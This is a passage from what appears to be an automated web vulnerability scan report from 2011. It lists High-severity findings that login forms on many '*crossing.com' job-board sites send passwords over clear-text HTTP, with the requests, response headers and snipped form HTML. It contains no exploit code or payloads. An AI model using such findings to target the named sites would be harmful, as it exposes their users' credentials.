var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.admincrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.6. http://www.advertisingcrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.advertisingcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.advertisingcrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.advertisingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:29 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=4vstlithvj0cev5m57soav4bi3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:29 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 121935

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.advertisingcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.7. http://www.aerospacecrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.aerospacecrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.aerospacecrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.aerospacecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:33 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=smekqvtb2jtrk9a1sqbg5kk4u3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:33 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:33 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:33 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:33 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:33 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:33 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:33 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:33 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109477

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.aerospacecrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.8. http://www.agriculturalcrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.agriculturalcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.agriculturalcrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.agriculturalcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:34 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ukabttsk8nejv6h58lpcqprfk1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:34 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:34 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:34 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:34 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:34 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:34 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:34 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:34 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 102618

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.agriculturalcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.9. http://www.architecturecrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.architecturecrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.architecturecrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.architecturecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:50 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=u8cdprgtig27p3jst5fgnvcol0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:51 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:51 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:51 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:51 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:51 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:51 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:51 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:51 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 125304

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.architecturecrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.10. http://www.attorneyresume.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.attorneyresume.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.attorneyresume.com/

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.attorneyresume.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.11. http://www.auditorcrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.auditorcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.auditorcrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.auditorcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:52 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=16al60hefdulh9nl41fvb7adh1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:52 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:52 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:52 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:52 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:52 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:52 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:52 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:52 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 125427

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.auditorcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.12. http://www.automotivecrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.automotivecrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.automotivecrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.automotivecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:56 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=chphkc8gns7vn2rq112ej1g8s5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:56 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:56 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:56 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:56 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:56 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:56 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:56 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:56 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109012

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.automotivecrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.13. http://www.aviationcrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.aviationcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.aviationcrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.aviationcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:22:03 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=5ito8gdqrme71tdpjpbd47goi6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:22:03 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:22:03 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:22:03 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:22:03 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:22:03 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:22:03 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:22:03 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:22:03 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 123144

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.aviationcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.14. http://www.bilingualcrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bilingualcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.bilingualcrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.bilingualcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:03 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=3jv1797bk3m69qp27lbh4qrqj2; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:03 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:03 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:03 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:03 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:03 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:03 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:03 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:03 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 133153

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.bilingualcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.15. http://www.biotechcrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.biotechcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.biotechcrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.biotechcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:05 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=u6vsjargff90aq2r4fvrep9g90; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:05 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:05 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:05 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:05 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:05 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:05 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:05 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:05 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 119741

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.biotechcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.16. http://www.bluecollarcrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bluecollarcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.bluecollarcrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.bluecollarcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:36 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=phn4e0vehg11att6t127knugu0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:36 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:36 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:36 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:36 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:36 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:36 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:36 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:36 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 149168

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.bluecollarcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.17. http://www.businessanalystcrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.businessanalystcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.businessanalystcrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.businessanalystcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:41 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=kldqa0cqamr0mp6anoh752e7o2; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:41 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 124047

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.businessanalystcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.18. http://www.businessdevelopmentcrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.businessdevelopmentcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.businessdevelopmentcrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.businessdevelopmentcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:41 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ru1216s8gi6hento64jtdlqce3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:41 GMT
